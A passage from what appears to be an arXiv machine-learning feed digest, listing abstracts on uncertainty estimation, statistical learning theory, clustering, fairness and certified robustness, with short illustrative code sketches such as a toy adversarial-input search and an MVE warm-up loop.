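    target = predict(x)
    seq, current = [], x
    for _ in range(max_depth):
        candidates = [t(current) for t in transforms]
        candidates = [c for c in candidates if is_valid(c)]   # constraints
        flipped = [c for c in candidates if predict(c) != target]
        if flipped:
            return seq + [flipped[0]]          # adversarial input found
        if not candidates:
            return None                        # search dead-ends
        current = candidates[0]                # toy heuristic: first valid move
        seq.append(current)
    return None
```

Replacing the first-valid heuristic with a scored frontier (beam or best-first search) and richer transformation sets is where a practical framework does its work; the point here is that the search is defined over input transformations, not raw pixel perturbations.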
    How to Evaluate Uncertainty Estimates in Machine Learning for Regression?. (arXiv:2106.03395v2 [stat.ML] UPDATED)
    As neural networks become more popular, the need for accompanying uncertainty estimates increases. There are currently two main approaches to test the quality of these estimates. Most methods output a density. They can be compared by evaluating their loglikelihood on a test set. Other methods output a prediction interval directly. These methods are often tested by examining the fraction of test points that fall inside the corresponding prediction intervals. Intuitively both approaches seem logical. However, we demonstrate through both theoretical arguments and simulations that both ways of evaluating the quality of uncertainty estimates have serious flaws. Firstly, both approaches cannot disentangle the separate components that jointly create the predictive uncertainty, making it difficult to evaluate the quality of the estimates of these components. Secondly, a better loglikelihood does not guarantee better prediction intervals, which is what the methods are often used for in practice. Moreover, the current approach to test prediction intervals directly has additional flaws. We show why it is fundamentally flawed to test a prediction or confidence interval on a single test set. At best, marginal coverage is measured, implicitly averaging out overconfident and underconfident predictions. A much more desirable property is pointwise coverage, requiring the correct coverage for each prediction. We demonstrate through practical examples that these effects can result in favoring a method, based on the predictive uncertainty, that has undesirable behaviour of the confidence or prediction intervals. Finally, we propose a simulation-based testing approach that addresses these problems while still allowing easy comparison between different methods.  ( 3 min )
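The marginal-versus-pointwise distinction is easy to demonstrate numerically: intervals that are too narrow on one half of the input space and too wide on the other can still hit the nominal rate on average. A small simulation with hand-picked half-widths (1.2816 and 3.2905 are the standard normal quantiles giving 80% and 99.9% two-sided coverage; all numbers are chosen for the example):

```python
import numpy as np

rng = np.random.default_rng(0)
n = 100_000
x = rng.uniform(0, 1, n)
y = rng.normal(0, 1, n)            # the true noise is N(0, 1) everywhere

# Nominal 90% intervals that are miscalibrated in opposite directions:
# 80% coverage where x < 0.5, 99.9% coverage where x >= 0.5.
w = np.where(x < 0.5, 1.2816, 3.2905)
covered = np.abs(y) < w

marginal = covered.mean()          # averages out to roughly 0.90
left = covered[x < 0.5].mean()     # badly undercovers
right = covered[x >= 0.5].mean()   # badly overcovers
```

A single-test-set check of the fraction covered sees only `marginal` and would declare these intervals well calibrated, which is exactly the flaw the paper describes.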
    Telematics Combined Actuarial Neural Networks for Cross-Sectional and Longitudinal Claim Count Data. (arXiv:2308.01729v1 [stat.ML])
We present novel cross-sectional and longitudinal claim count models for vehicle insurance built upon the Combined Actuarial Neural Network (CANN) framework proposed by Mario Wüthrich and Michael Merz. The CANN approach combines a classical actuarial model, such as a generalized linear model, with a neural network. This blending of models results in a two-component model comprising a classical regression model and a neural network part. The CANN model leverages the strengths of both components, providing a solid foundation and interpretability from the classical model while harnessing the flexibility and capacity to capture intricate relationships and interactions offered by the neural network. In our proposed models, we use well-known log-linear claim count regression models for the classical regression part and a multilayer perceptron (MLP) for the neural network part. The MLP part is used to process telematics car driving data given as a vector characterizing the driving behavior of each insured driver. In addition to the Poisson and negative binomial distributions for cross-sectional data, we propose a procedure for training our CANN model with a multivariate negative binomial (MVNB) specification. By doing so, we introduce a longitudinal model that accounts for the dependence between contracts from the same insured. Our results reveal that the CANN models exhibit superior performance compared to log-linear models that rely on manually engineered telematics features.
    Is your data alignable? Principled and interpretable alignability testing and integration of single-cell data. (arXiv:2308.01839v1 [q-bio.QM])
    Single-cell data integration can provide a comprehensive molecular view of cells, and many algorithms have been developed to remove unwanted technical or biological variations and integrate heterogeneous single-cell datasets. Despite their wide usage, existing methods suffer from several fundamental limitations. In particular, we lack a rigorous statistical test for whether two high-dimensional single-cell datasets are alignable (and therefore should even be aligned). Moreover, popular methods can substantially distort the data during alignment, making the aligned data and downstream analysis difficult to interpret. To overcome these limitations, we present a spectral manifold alignment and inference (SMAI) framework, which enables principled and interpretable alignability testing and structure-preserving integration of single-cell data. SMAI provides a statistical test to robustly determine the alignability between datasets to avoid misleading inference, and is justified by high-dimensional statistical theory. On a diverse range of real and simulated benchmark datasets, it outperforms commonly used alignment methods. Moreover, we show that SMAI improves various downstream analyses such as identification of differentially expressed genes and imputation of single-cell spatial transcriptomics, providing further biological insights. SMAI's interpretability also enables quantification and a deeper understanding of the sources of technical confounders in single-cell data.
    Optimal Training of Mean Variance Estimation Neural Networks. (arXiv:2302.08875v2 [stat.ML] UPDATED)
    This paper focusses on the optimal implementation of a Mean Variance Estimation network (MVE network) (Nix and Weigend, 1994). This type of network is often used as a building block for uncertainty estimation methods in a regression setting, for instance Concrete dropout (Gal et al., 2017) and Deep Ensembles (Lakshminarayanan et al., 2017). Specifically, an MVE network assumes that the data is produced from a normal distribution with a mean function and variance function. The MVE network outputs a mean and variance estimate and optimizes the network parameters by minimizing the negative loglikelihood. In our paper, we present two significant insights. Firstly, the convergence difficulties reported in recent work can be relatively easily prevented by following the simple yet often overlooked recommendation from the original authors that a warm-up period should be used. During this period, only the mean is optimized with a fixed variance. We demonstrate the effectiveness of this step through experimentation, highlighting that it should be standard practice. As a sidenote, we examine whether, after the warm-up, it is beneficial to fix the mean while optimizing the variance or to optimize both simultaneously. Here, we do not observe a substantial difference. Secondly, we introduce a novel improvement of the MVE network: separate regularization of the mean and the variance estimate. We demonstrate, both on toy examples and on a number of benchmark UCI regression data sets, that following the original recommendations and the novel separate regularization can lead to significant improvements.
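The warm-up recommendation translates directly into a two-phase training loop: first minimize the squared error of the mean with the variance frozen, then minimize the Gaussian negative log-likelihood jointly. A minimal numpy sketch on a linear mean and a constant log-variance (the paper uses full networks; all hyperparameters here are illustrative):

```python
import numpy as np

def train_mve(x, y, warmup=500, joint=500, lr=0.05):
    """Two-phase MVE training: the warm-up optimises only the mean
    with the variance frozen at 1; afterwards mean and variance are
    optimised jointly under the Gaussian NLL. Toy linear model."""
    w, b, s = 0.0, 0.0, 0.0          # mean slope, intercept, log-variance
    for step in range(warmup + joint):
        mu = w * x + b
        var = np.exp(s)
        # gradient of the mean Gaussian NLL 0.5*(s + (y-mu)^2/var)
        g_mu = -(y - mu) / var
        w -= lr * np.mean(g_mu * x)
        b -= lr * np.mean(g_mu)
        if step >= warmup:           # variance stays frozen during warm-up
            g_s = 0.5 * (1.0 - (y - mu) ** 2 / var)
            s -= lr * np.mean(g_s)
    return w, b, np.exp(s)
```

With the variance frozen at 1, the warm-up phase reduces exactly to least squares on the mean, which is what prevents the early-training pathology where an inflated variance estimate mutes the mean gradient.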
    Normative framework for deriving neural networks with multi-compartmental neurons and non-Hebbian plasticity. (arXiv:2302.10051v2 [q-bio.NC] UPDATED)
    An established normative approach for understanding the algorithmic basis of neural computation is to derive online algorithms from principled computational objectives and evaluate their compatibility with anatomical and physiological observations. Similarity matching objectives have served as successful starting points for deriving online algorithms that map onto neural networks (NNs) with point neurons and Hebbian/anti-Hebbian plasticity. These NN models account for many anatomical and physiological observations; however, the objectives have limited computational power and the derived NNs do not explain multi-compartmental neuronal structures and non-Hebbian forms of plasticity that are prevalent throughout the brain. In this article, we unify and generalize recent extensions of the similarity matching approach to address more complex objectives, including a large class of unsupervised and self-supervised learning tasks that can be formulated as symmetric generalized eigenvalue problems or nonnegative matrix factorization problems. Interestingly, the online algorithms derived from these objectives naturally map onto NNs with multi-compartmental neurons and local, non-Hebbian learning rules. Therefore, this unified extension of the similarity matching approach provides a normative framework that facilitates understanding multi-compartmental neuronal structures and non-Hebbian plasticity found throughout the brain.
    Online covariance estimation for stochastic gradient descent under Markovian sampling. (arXiv:2308.01481v1 [math.ST])
We study the online overlapping batch-means covariance estimator for Stochastic Gradient Descent (SGD) under Markovian sampling. We show that the convergence rates of the covariance estimator are $O\big(\sqrt{d}\,n^{-1/8}(\log n)^{1/4}\big)$ and $O\big(\sqrt{d}\,n^{-1/8}\big)$ under state-dependent and state-independent Markovian sampling, respectively, with $d$ representing dimensionality and $n$ denoting the number of observations or SGD iterations. Remarkably, these rates match the best-known convergence rate previously established for the independent and identically distributed (i.i.d.) case by (Zhu et al., 2021), up to logarithmic factors. Our analysis overcomes significant challenges that arise due to Markovian sampling, leading to the introduction of additional error terms and complex dependencies between the blocks of the batch-means covariance estimator. Moreover, we establish the convergence rate for the first four moments of the $\ell_2$ norm of the error of SGD dynamics under state-dependent Markovian data, which holds potential interest as an independent result. To validate our theoretical findings, we provide numerical illustrations to derive confidence intervals for SGD when training linear and logistic regression models under Markovian sampling. Additionally, we apply our approach to tackle the intriguing problem of strategic classification with logistic regression, where adversaries can adaptively modify features during the training process to increase their chances of being classified in a specific target class.
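The online, overlapping estimator analyzed in the paper refines the basic batch-means construction, which is compact enough to sketch: split the correlated iterates into batches, average each batch, and take the empirical covariance of the batch means scaled by the batch length. An offline, non-overlapping sketch for illustration only:

```python
import numpy as np

def batch_means_covariance(iterates, batch_len):
    """Estimate the long-run covariance of the average of correlated
    iterates via non-overlapping batch means: batch_len * Cov(batch
    averages). The paper's estimator is an online, overlapping
    refinement of this classical construction."""
    iterates = np.asarray(iterates)
    n, d = iterates.shape
    k = n // batch_len
    batches = iterates[: k * batch_len].reshape(k, batch_len, d)
    means = batches.mean(axis=1)               # one mean per batch
    centred = means - means.mean(axis=0)
    return batch_len * (centred.T @ centred) / (k - 1)
```

On a scalar AR(1) chain $x_t = \rho x_{t-1} + \varepsilon_t$ with unit-variance noise, the long-run variance is $1/(1-\rho)^2$, which the estimator recovers when the batch length dominates the mixing time.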
    Minimax Optimal $Q$ Learning with Nearest Neighbors. (arXiv:2308.01490v1 [cs.LG])
$Q$ learning is a popular model-free reinforcement learning method. Most existing works focus on analyzing $Q$ learning for finite state and action spaces. If the state space is continuous, the original $Q$ learning method cannot be directly used. A modification of the original $Q$ learning method was proposed in (Shah and Xie, 2018), which estimates $Q$ values with nearest neighbors, making $Q$ learning suitable for continuous state spaces. (Shah and Xie, 2018) shows that the convergence rate of the estimated $Q$ function is $\tilde{O}(T^{-1/(d+3)})$, which is slower than the minimax lower bound $\tilde{\Omega}(T^{-1/(d+2)})$, indicating that this method is not efficient. This paper proposes two new $Q$ learning methods to bridge that gap in convergence rates, one offline and one online. Although we still use a nearest-neighbor approach to estimate the $Q$ function, our algorithms are crucially different from (Shah and Xie, 2018): in particular, we replace the kernel nearest-neighbor estimate on a discretized region with a direct nearest-neighbor approach. Consequently, our approach significantly improves the convergence rate, and the time complexity is also significantly improved in high-dimensional state spaces. Our analysis shows that both the offline and online methods are minimax rate optimal.
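The direct nearest-neighbor estimate at the heart of such methods is simple to state: $Q(s, a)$ is read off from the stored value at the nearest sampled state, and offline iterations apply Bellman backups over a covering set of states. A toy sketch on a 1-D deterministic MDP with reward equal to the next state (everything here is illustrative, not the paper's exact algorithm):

```python
import numpy as np

def nn_q_iteration(states, step=0.1, gamma=0.9, n_iter=200):
    """Offline Q-iteration with direct nearest-neighbour lookups:
    Bellman backups on a finite covering set of states, reading
    Q(s', .) from the nearest stored state. Toy sketch only."""
    n = len(states)
    Q = np.zeros((n, 2))
    moves = np.array([-step, step])            # two actions: left / right
    for _ in range(n_iter):
        Q_new = np.empty_like(Q)
        for i, s in enumerate(states):
            for a in range(2):
                s_next = np.clip(s + moves[a], 0.0, 1.0)
                j = np.argmin(np.abs(states - s_next))    # nearest neighbour
                Q_new[i, a] = s_next + gamma * Q[j].max() # reward = s'
        Q = Q_new
    return Q
```

Since the reward grows with the state, the greedy policy recovered from the converged $Q$ table moves right everywhere, and the value at the right endpoint approaches the fixed point $1/(1-\gamma) = 10$.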
    Random Planted Forest: a directly interpretable tree ensemble. (arXiv:2012.14563v3 [stat.ML] UPDATED)
    We introduce a novel interpretable tree based algorithm for prediction in a regression setting. Our motivation is to estimate the unknown regression function from a functional decomposition perspective in which the functional components correspond to lower order interaction terms. The idea is to modify the random forest algorithm by keeping certain leaves after they are split instead of deleting them. This leads to non-binary trees which we refer to as planted trees. An extension to a forest leads to our random planted forest algorithm. Additionally, the maximum number of covariates which can interact within a leaf can be bounded. If we set this interaction bound to one, the resulting estimator is a sum of one-dimensional functions. In the other extreme case, if we do not set a limit, the resulting estimator and corresponding model place no restrictions on the form of the regression function. In a simulation study we find encouraging prediction and visualisation properties of our random planted forest method. We also develop theory for an idealized version of random planted forests in cases where the interaction bound is low. We show that if it is smaller than three, the idealized version achieves asymptotically optimal convergence rates up to a logarithmic factor. Code is available on GitHub https://github.com/PlantedML/randomPlantedForest.
    Non-equilibrium physics: from spin glasses to machine and neural learning. (arXiv:2308.01538v1 [cond-mat.dis-nn])
    Disordered many-body systems exhibit a wide range of emergent phenomena across different scales. These complex behaviors can be utilized for various information processing tasks such as error correction, learning, and optimization. Despite the empirical success of utilizing these systems for intelligent tasks, the underlying principles that govern their emergent intelligent behaviors remain largely unknown. In this thesis, we aim to characterize such emergent intelligence in disordered systems through statistical physics. We chart a roadmap for our efforts in this thesis based on two axes: learning mechanisms (long-term memory vs. working memory) and learning dynamics (artificial vs. natural). Throughout our journey, we uncover relationships between learning mechanisms and physical dynamics that could serve as guiding principles for designing intelligent systems. We hope that our investigation into the emergent intelligence of seemingly disparate learning systems can expand our current understanding of intelligence beyond neural systems and uncover a wider range of computational substrates suitable for AI applications.
    RAB: Provable Robustness Against Backdoor Attacks. (arXiv:2003.08904v8 [cs.LG] UPDATED)
    Recent studies have shown that deep neural networks (DNNs) are vulnerable to adversarial attacks, including evasion and backdoor (poisoning) attacks. On the defense side, there have been intensive efforts on improving both empirical and provable robustness against evasion attacks; however, the provable robustness against backdoor attacks still remains largely unexplored. In this paper, we focus on certifying the machine learning model robustness against general threat models, especially backdoor attacks. We first provide a unified framework via randomized smoothing techniques and show how it can be instantiated to certify the robustness against both evasion and backdoor attacks. We then propose the first robust training process, RAB, to smooth the trained model and certify its robustness against backdoor attacks. We prove the robustness bound for machine learning models trained with RAB and prove that our robustness bound is tight. In addition, we theoretically show that it is possible to train the robust smoothed models efficiently for simple models such as K-nearest neighbor classifiers, and we propose an exact smooth-training algorithm that eliminates the need to sample from a noise distribution for such models. Empirically, we conduct comprehensive experiments for different machine learning (ML) models such as DNNs, support vector machines, and K-NN models on MNIST, CIFAR-10, and ImageNette datasets and provide the first benchmark for certified robustness against backdoor attacks. In addition, we evaluate K-NN models on a spambase tabular dataset to demonstrate the advantages of the proposed exact algorithm. Both the theoretic analysis and the comprehensive evaluation on diverse ML models and datasets shed light on further robust learning strategies against general training time attacks.
    How to Evaluate Uncertainty Estimates in Machine Learning for Regression?. (arXiv:2106.03395v2 [stat.ML] UPDATED)
As neural networks become more popular, the need for accompanying uncertainty estimates increases. There are currently two main approaches to test the quality of these estimates. Most methods output a density. They can be compared by evaluating their log-likelihood on a test set. Other methods output a prediction interval directly. These methods are often tested by examining the fraction of test points that fall inside the corresponding prediction intervals. Intuitively, both approaches seem logical. However, we demonstrate through both theoretical arguments and simulations that both ways of evaluating the quality of uncertainty estimates have serious flaws. Firstly, neither approach can disentangle the separate components that jointly create the predictive uncertainty, making it difficult to evaluate the quality of the estimates of these components. Secondly, a better log-likelihood does not guarantee better prediction intervals, which is what the methods are often used for in practice. Moreover, the current approach to test prediction intervals directly has additional flaws. We show why it is fundamentally flawed to test a prediction or confidence interval on a single test set. At best, marginal coverage is measured, implicitly averaging out overconfident and underconfident predictions. A much more desirable property is pointwise coverage, requiring the correct coverage for each prediction. We demonstrate through practical examples that these effects can result in favoring a method, based on the predictive uncertainty, that has undesirable behaviour of the confidence or prediction intervals. Finally, we propose a simulation-based testing approach that addresses these problems while still allowing easy comparison between different methods.
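The marginal-vs-pointwise gap the abstract describes is easy to reproduce in a few lines of standard-library Python: with heteroscedastic noise, a single interval width can hit 90% coverage on average while overcovering easy points and undercovering hard ones (a toy simulation under my own assumptions, not the paper's setup):

```python
import random

random.seed(0)
n = 100_000
data = []
for _ in range(n):
    x = random.random()
    sigma = 0.5 if x < 0.5 else 1.5   # heteroscedastic noise level
    data.append((x, random.gauss(0.0, sigma)))

# A constant-width interval calibrated to ~90% *marginal* coverage.
abs_y = sorted(abs(y) for _, y in data)
half_width = abs_y[int(0.9 * n)]

def coverage(points):
    return sum(abs(y) <= half_width for _, y in points) / len(points)

marginal = coverage(data)
low_noise = coverage([p for p in data if p[0] < 0.5])    # overcovered region
high_noise = coverage([p for p in data if p[0] >= 0.5])  # undercovered region
```

Marginal coverage lands near 0.90 by construction, yet the low-noise half is covered almost always and the high-noise half well below the nominal level — exactly the averaging-out effect the paper warns about.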
    Causal thinking for decision making on Electronic Health Records: why and how. (arXiv:2308.01605v1 [stat.ME])
Accurate predictions, as with machine learning, may not suffice to provide optimal healthcare for every patient. Indeed, prediction can be driven by shortcuts in the data, such as racial biases. Causal thinking is needed for data-driven decisions. Here, we give an introduction to the key elements, focusing on routinely-collected data, electronic health records (EHRs) and claims data. Using such data to assess the value of an intervention requires care: temporal dependencies and existing practices easily confound the causal effect. We present a step-by-step framework to help build valid decision making from real-life patient records by emulating a randomized trial before individualizing decisions, e.g., with machine learning. Our framework highlights the most important pitfalls and considerations in analysing EHRs or claims data to draw causal conclusions. We illustrate the various choices in studying the effect of albumin on sepsis mortality in the Medical Information Mart for Intensive Care database (MIMIC-IV). We study the impact of various choices at every step, from feature extraction to causal-estimator selection. In a tutorial spirit, the code and the data are openly available.
    Compressed and distributed least-squares regression: convergence rates with applications to Federated Learning. (arXiv:2308.01358v1 [cs.LG])
In this paper, we investigate the impact of compression on stochastic gradient algorithms for machine learning, a technique widely used in distributed and federated learning. We underline differences in terms of convergence rates between several unbiased compression operators that all satisfy the same condition on their variance, thus going beyond the classical worst-case analysis. To do so, we focus on the case of least-squares regression (LSR) and analyze a general stochastic approximation algorithm for minimizing quadratic functions relying on a random field. We consider weak assumptions on the random field, tailored to the analysis (specifically, expected H\"older regularity), and on the noise covariance, enabling the analysis of various randomizing mechanisms, including compression. We then extend our results to the case of federated learning. More formally, we highlight the impact on the convergence of the covariance $\mathfrak{C}_{\mathrm{ania}}$ of the additive noise induced by the algorithm. We demonstrate that, despite the non-regularity of the stochastic field, the limiting variance term scales with $\mathrm{Tr}(\mathfrak{C}_{\mathrm{ania}} H^{-1})/K$ (where $H$ is the Hessian of the optimization problem and $K$ the number of iterations), generalizing the rate for the vanilla LSR case where it is $\sigma^2 \mathrm{Tr}(H H^{-1}) / K = \sigma^2 d / K$ (Bach and Moulines, 2013). Then, we analyze the dependency of $\mathfrak{C}_{\mathrm{ania}}$ on the compression strategy and ultimately its impact on convergence, first in the centralized case, then in two heterogeneous FL frameworks.
    Matrix Estimation for Individual Fairness. (arXiv:2302.02096v2 [cs.LG] UPDATED)
    In recent years, multiple notions of algorithmic fairness have arisen. One such notion is individual fairness (IF), which requires that individuals who are similar receive similar treatment. In parallel, matrix estimation (ME) has emerged as a natural paradigm for handling noisy data with missing values. In this work, we connect the two concepts. We show that pre-processing data using ME can improve an algorithm's IF without sacrificing performance. Specifically, we show that using a popular ME method known as singular value thresholding (SVT) to pre-process the data provides a strong IF guarantee under appropriate conditions. We then show that, under analogous conditions, SVT pre-processing also yields estimates that are consistent and approximately minimax optimal. As such, the ME pre-processing step does not, under the stated conditions, increase the prediction error of the base algorithm, i.e., does not impose a fairness-performance trade-off. We verify these results on synthetic and real data.
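For intuition, the SVT pre-processing step the abstract refers to is a one-liner around the SVD: keep only singular values above a threshold. A generic NumPy sketch on synthetic low-rank data (the threshold `tau=5.0` is an assumption for this toy scale, not the paper's calibrated choice):

```python
import numpy as np

def svt(A, tau):
    """Singular value thresholding: zero out singular values below tau."""
    U, s, Vt = np.linalg.svd(A, full_matrices=False)
    return (U * np.where(s >= tau, s, 0.0)) @ Vt

rng = np.random.default_rng(0)
low_rank = rng.normal(size=(50, 2)) @ rng.normal(size=(2, 40))  # rank-2 signal
noisy = low_rank + 0.1 * rng.normal(size=(50, 40))              # noisy observations
denoised = svt(noisy, tau=5.0)  # recovers a rank-2 matrix closer to the signal
```

With the noise scale well below the signal's singular values, the thresholded matrix has rank 2 and a smaller reconstruction error than the raw noisy data — the sense in which ME pre-processing denoises before the downstream algorithm runs.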
    Stable and consistent density-based clustering via multiparameter persistence. (arXiv:2005.09048v3 [math.ST] UPDATED)
    We consider the degree-Rips construction from topological data analysis, which provides a density-sensitive, multiparameter hierarchical clustering algorithm. We analyze its stability to perturbations of the input data using the correspondence-interleaving distance, a metric for hierarchical clusterings that we introduce. Taking certain one-parameter slices of degree-Rips recovers well-known methods for density-based clustering, but we show that these methods are unstable. However, we prove that degree-Rips, as a multiparameter object, is stable, and we propose an alternative approach for taking slices of degree-Rips, which yields a one-parameter hierarchical clustering algorithm with better stability properties. We prove that this algorithm is consistent, using the correspondence-interleaving distance. We provide an algorithm for extracting a single clustering from one-parameter hierarchical clusterings, which is stable with respect to the correspondence-interleaving distance. And, we integrate these methods into a pipeline for density-based clustering, which we call Persistable. Adapting tools from multiparameter persistent homology, we propose visualization tools that guide the selection of all parameters of the pipeline. We demonstrate Persistable on benchmark datasets, showing that it identifies multi-scale cluster structure in data.
    Efficiency of First-Order Methods for Low-Rank Tensor Recovery with the Tensor Nuclear Norm Under Strict Complementarity. (arXiv:2308.01677v1 [math.OC])
We consider convex relaxations for recovering low-rank tensors based on constrained minimization over a ball induced by the tensor nuclear norm, recently introduced in \cite{tensor_tSVD}. We build on a recent line of results that considered convex relaxations for the recovery of low-rank matrices and established that under a strict complementarity condition (SC), both the convergence rate and per-iteration runtime of standard gradient methods may improve dramatically. We develop the appropriate strict complementarity condition for the tensor nuclear norm ball and obtain the following main results under this condition: 1. When the objective to minimize is of the form $f(X)=g(AX)+\langle C, X\rangle$, where $g$ is strongly convex and $A$ is a linear map (e.g., least squares), a quadratic growth bound holds, which implies linear convergence rates for standard projected gradient methods, despite the fact that $f$ need not be strongly convex. 2. For a smooth objective function, when initialized in certain proximity of an optimal solution which satisfies SC, standard projected gradient methods only require SVD computations (for projecting onto the tensor nuclear norm ball) of rank that matches the tubal rank of the optimal solution. In particular, when the tubal rank is constant, this implies nearly linear (in the size of the tensor) runtime per iteration, as opposed to superlinear without further assumptions. 3. For a nonsmooth objective function which admits a popular smooth saddle-point formulation, we derive similar results to the latter for the well known extragradient method. An additional contribution which may be of independent interest, is the rigorous extension of many basic results regarding tensors of arbitrary order, which were previously obtained only for third-order tensors.
    An efficient, provably exact, practical algorithm for the 0-1 loss linear classification problem. (arXiv:2306.12344v2 [cs.LG] UPDATED)
Algorithms for solving the linear classification problem have a long history, dating back at least to 1936 with linear discriminant analysis. For linearly separable data, many algorithms can obtain the exact solution to the corresponding 0-1 loss classification problem efficiently, but for data which is not linearly separable, it has been shown that this problem, in full generality, is NP-hard. Alternative approaches all involve approximations of some kind, including the use of surrogates for the 0-1 loss (for example, the hinge or logistic loss) or approximate combinatorial search, none of which can be guaranteed to solve the problem exactly. Finding efficient algorithms to obtain an exact, i.e., globally optimal, solution for the 0-1 loss linear classification problem with fixed dimension remains an open problem. In research we report here, we detail the rigorous construction of a new algorithm, incremental cell enumeration (ICE), that can solve the 0-1 loss classification problem exactly in polynomial time. We prove correctness using concepts from the theory of hyperplane arrangements and oriented matroids. We demonstrate the effectiveness of this algorithm on synthetic and real-world datasets, showing optimal accuracy both in and out-of-sample, in practical computational time. We also empirically demonstrate how the use of an approximate upper bound leads to run-time improvements to the polynomial-time algorithm whilst retaining exactness. To our knowledge, this is the first rigorously proven, polynomial-time, practical algorithm for this long-standing problem.
    Robust, randomized preconditioning for kernel ridge regression. (arXiv:2304.12465v3 [math.NA] UPDATED)
    This paper introduces two randomized preconditioning techniques for robustly solving kernel ridge regression (KRR) problems with a medium to large number of data points ($10^4 \leq N \leq 10^7$). The first method, RPCholesky preconditioning, is capable of accurately solving the full-data KRR problem in $O(N^2)$ arithmetic operations, assuming sufficiently rapid polynomial decay of the kernel matrix eigenvalues. The second method, KRILL preconditioning, offers an accurate solution to a restricted version of the KRR problem involving $k \ll N$ selected data centers at a cost of $O((N + k^2) k \log k)$ operations. The proposed methods solve a broad range of KRR problems and overcome the failure modes of previous KRR preconditioners, making them ideal for practical applications.  ( 2 min )
    Distribution-Free Inference for the Regression Function of Binary Classification. (arXiv:2308.01835v1 [stat.ML])
One of the key objects of binary classification is the regression function, i.e., the conditional expectation of the class labels given the inputs. Not only can a Bayes optimal classifier be defined from the regression function; it also encodes the corresponding misclassification probabilities. The paper presents a resampling framework to construct exact, distribution-free and non-asymptotically guaranteed confidence regions for the true regression function for any user-chosen confidence level. Then, specific algorithms are suggested to demonstrate the framework. It is proved that the constructed confidence regions are strongly consistent, that is, any false model is excluded in the long run with probability one. The exclusion is quantified with probably approximately correct type bounds, as well. Finally, the algorithms are validated via numerical experiments, and the methods are compared to approximate asymptotic confidence ellipsoids.  ( 2 min )
    Statistical Estimation Under Distribution Shift: Wasserstein Perturbations and Minimax Theory. (arXiv:2308.01853v1 [stat.ML])
    Distribution shifts are a serious concern in modern statistical learning as they can systematically change the properties of the data away from the truth. We focus on Wasserstein distribution shifts, where every data point may undergo a slight perturbation, as opposed to the Huber contamination model where a fraction of observations are outliers. We formulate and study shifts beyond independent perturbations, exploring Joint Distribution Shifts, where the per-observation perturbations can be coordinated. We analyze several important statistical problems, including location estimation, linear regression, and non-parametric density estimation. Under a squared loss for mean estimation and prediction error in linear regression, we find the exact minimax risk, a least favorable perturbation, and show that the sample mean and least squares estimators are respectively optimal. This holds for both independent and joint shifts, but the least favorable perturbations and minimax risks differ. For other problems, we provide nearly optimal estimators and precise finite-sample bounds. We also introduce several tools for bounding the minimax risk under distribution shift, such as a smoothing technique for location families, and generalizations of classical tools including least favorable sequences of priors, the modulus of continuity, Le Cam's, Fano's, and Assouad's methods.  ( 2 min )
    Adversarial Meta-Learning of Gamma-Minimax Estimators That Leverage Prior Knowledge. (arXiv:2012.05465v5 [stat.ME] UPDATED)
    Bayes estimators are well known to provide a means to incorporate prior knowledge that can be expressed in terms of a single prior distribution. However, when this knowledge is too vague to express with a single prior, an alternative approach is needed. Gamma-minimax estimators provide such an approach. These estimators minimize the worst-case Bayes risk over a set $\Gamma$ of prior distributions that are compatible with the available knowledge. Traditionally, Gamma-minimaxity is defined for parametric models. In this work, we define Gamma-minimax estimators for general models and propose adversarial meta-learning algorithms to compute them when the set of prior distributions is constrained by generalized moments. Accompanying convergence guarantees are also provided. We also introduce a neural network class that provides a rich, but finite-dimensional, class of estimators from which a Gamma-minimax estimator can be selected. We illustrate our method in two settings, namely entropy estimation and a prediction problem that arises in biodiversity studies.  ( 2 min )
    Interpretable Machine Learning for Discovery: Statistical Challenges \& Opportunities. (arXiv:2308.01475v1 [stat.ML])
New technologies have led to vast troves of large and complex datasets across many scientific domains and industries. People routinely use machine learning techniques to not only process, visualize, and make predictions from this big data, but also to make data-driven discoveries. These discoveries are often made using Interpretable Machine Learning, or machine learning models and techniques that yield human understandable insights. In this paper, we discuss and review the field of interpretable machine learning, focusing especially on the techniques as they are often employed to generate new knowledge or make discoveries from large datasets. We outline the types of discoveries that can be made using Interpretable Machine Learning in both supervised and unsupervised settings. Additionally, we focus on the grand challenge of how to validate these discoveries in a data-driven manner, which promotes trust in machine learning systems and reproducibility in science. We discuss validation from both a practical perspective, reviewing approaches based on data-splitting and stability, as well as from a theoretical perspective, reviewing statistical results on model selection consistency and uncertainty quantification via statistical inference. Finally, we conclude by highlighting open challenges in using interpretable machine learning techniques to make discoveries, including gaps between theory and practice for validating data-driven discoveries.  ( 2 min )
    Confident Neural Network Regression with Bootstrapped Deep Ensembles. (arXiv:2202.10903v2 [stat.ML] UPDATED)
With the rise of the popularity and usage of neural networks, trustworthy uncertainty estimation is becoming increasingly essential. One of the most prominent uncertainty estimation methods is Deep Ensembles (Lakshminarayanan et al., 2017). A classical parametric model has uncertainty in the parameters due to the fact that the data on which the model is built is a random sample. A modern neural network has an additional uncertainty component since the optimization of the network is random. Lakshminarayanan et al. (2017) noted that Deep Ensembles do not incorporate the classical uncertainty induced by the effect of finite data. In this paper, we present a computationally cheap extension of Deep Ensembles for the regression setting, called Bootstrapped Deep Ensembles, that explicitly takes this classical effect of finite data into account using a modified version of the parametric bootstrap. We demonstrate through an experimental study that our method significantly improves upon standard Deep Ensembles.  ( 2 min )
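The core idea — each ensemble member trains on a parametric-bootstrap resample so finite-data uncertainty shows up in the ensemble spread — can be illustrated on a linear model (a toy sketch under my own assumptions, standing in for the paper's neural-network setting where refitting replaces retraining from a new random initialization):

```python
import numpy as np

rng = np.random.default_rng(0)
x = rng.uniform(-1.0, 1.0, 200)
y = 2.0 * x + rng.normal(0.0, 0.3, size=x.shape)   # true slope = 2.0

# Step 1: fit a reference model and estimate the residual noise level.
ref_slope, ref_intercept = np.polyfit(x, y, 1)
resid_std = np.std(y - (ref_slope * x + ref_intercept))

# Step 2: each ensemble member trains on a parametric-bootstrap resample:
# reference predictions plus freshly drawn noise.
members = [
    np.polyfit(x, ref_slope * x + ref_intercept
               + rng.normal(0.0, resid_std, size=x.shape), 1)[0]
    for _ in range(50)
]

mean_slope = float(np.mean(members))
spread = float(np.std(members))   # reflects finite-data parameter uncertainty
```

The ensemble mean recovers the true slope while the spread approximates the classical sampling uncertainty of the estimator — the component plain Deep Ensembles are noted to miss.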
    Fast Slate Policy Optimization: Going Beyond Plackett-Luce. (arXiv:2308.01566v1 [cs.LG])
